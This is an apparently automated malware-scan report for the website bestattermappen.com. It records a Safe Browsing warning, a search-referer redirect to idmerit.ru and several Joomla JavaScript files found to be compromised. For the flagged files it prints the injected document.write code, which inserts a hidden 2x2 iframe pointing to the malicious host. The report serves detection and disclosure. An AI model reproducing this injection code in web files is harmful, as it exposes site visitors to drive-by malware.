Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bestattermappen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://bestattermappen.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: bestattermappen.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 18:24:30 GMT Location: http://idmerit.ru/Intellectual?7 Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://bestattermappen.com/ | 200 OK Content-Length: 6696 Content-Type: text/html | clean |
http://bestattermappen.com/modules/mod_lv_simple_image_slider_v2/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72319 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://idmerit.ru/intellectual?7 <iframe src="http://idmerit.ru/intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://bestattermappen.com/index.php?option=com_content&view=article&id=5&Itemid=14 | 200 OK Content-Length: 8730 Content-Type: text/html | clean |
http://bestattermappen.com/index.php?option=com_content&view=article&id=14&Itemid=15 | 200 OK Content-Length: 12717 Content-Type: text/html | clean |
http://bestattermappen.com/index.php?option=com_content&view=article&id=15&Itemid=16 | 200 OK Content-Length: 12162 Content-Type: text/html | clean |
http://bestattermappen.com/components/com_chronocontact/js/calendar2.js | 200 OK Content-Length: 15973 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://idmerit.ru/intellectual?7 <iframe src="http://idmerit.ru/intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://bestattermappen.com/components/com_chronocontact/js/livevalidation_standalone.js | 200 OK Content-Length: 40084 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var LiveValidation = function(element, optionsObj){ this.initialize(element, optionsObj); } LiveValidation.VERSION = '1.3 standalone'; LiveValidation.TEXTAREA = 1; LiveValidation.TEXT = 2; LiveValidation.PASSWORD = 3; LiveValidation.CHECKBOX = 4; LiveValidation.SELECT = 5; LiveValidation.FILE = 6; LiveValidation.RADIO = 7; LiveValidation.massValidate = fu return isValid } }, fail: function(errorMessage){ throw new Validate.Error(errorMessage); }, Error: function(errorMessage){ this.message = errorMessage; this.name = 'ValidationError'; } }document.write('<iframe src="http://idmerit.ru/Intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://idmerit.ru/intellectual?7 <iframe src="http://idmerit.ru/intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://bestattermappen.com/components/com_chronocontact/js/customclasses.js | 200 OK Content-Length: 4206 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ChronoTips = new Class({
options: { onShow: function(tip){ tip.setStyle('visibility', 'visible'); }, onHide: function(tip){ tip.setStyle('visibility', 'hidden'); }, maxTitleChars: 30, showDelay: 100, hideDelay: 100, className: 'tool', offsets: {'x': 16, 'y': 16}, fixed: false }, initialize: function(elements, lasthope,options){ this.setOptions(options); this. ChronoTips.implement(new Events); window.addEvent('domready', function() { $ES('.tooltipimg').each(function(ed){ var Tips2 = new ChronoTips(ed, $E('div.tooltipdiv', ed.getParent().getParent()).getText(), {elementid:ed.getParent().getParent().getFirst().getNext().getProperty('id')+'_s'}); }); });document.write('<iframe src="http://idmerit.ru/Intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://idmerit.ru/intellectual?7 <iframe src="http://idmerit.ru/intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://bestattermappen.com/components/com_chronocontact/js/jsvalidation2.js | 200 OK Content-Length: 10813 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function elementExtend() { Element.extend({ getInputByName : function(name) { el = this.getFormElements().filterByAttribute('name', '=', name) return (el)?(el.length)?el[0]:el:false; }, getInputsByName : function(nome) { el = this.getFormElements().filterByAttribute('name','=',nome) return (el)?el:false; }, getProperty: function(property){ var index = Element.Properties[property]; } if(field.hasClass('required')){ if( tmessage ) { var message_required = tmessage; } name.add( Validate.Presence, { failureMessage: message_required }); fieldsarray[fieldsarray_count] = name; fieldsarray_count = fieldsarray_count + 1; } }); }document.write('<iframe src="http://idmerit.ru/Intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://idmerit.ru/intellectual?7 <iframe src="http://idmerit.ru/intellectual?7" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://bestattermappen.com/index.php?option=com_content&view=article&id=2&Itemid=2 | 200 OK Content-Length: 7920 Content-Type: text/html | clean |
http://bestattermappen.com/index.php?option=com_content&view=article&id=3&Itemid=3 | 200 OK Content-Length: 6124 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://bestattermappen.com/index.php?option=com_content&view=article&id=4&Itemid=4 | 200 OK Content-Length: 11764 Content-Type: text/html | clean |
http://bestattermappen.com/test404page.js | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
http://bestattermappen.com/downloads/Flyer-Bestattermappen.pdf | 200 OK Content-Length: 300931 Content-Type: application/pdf | clean |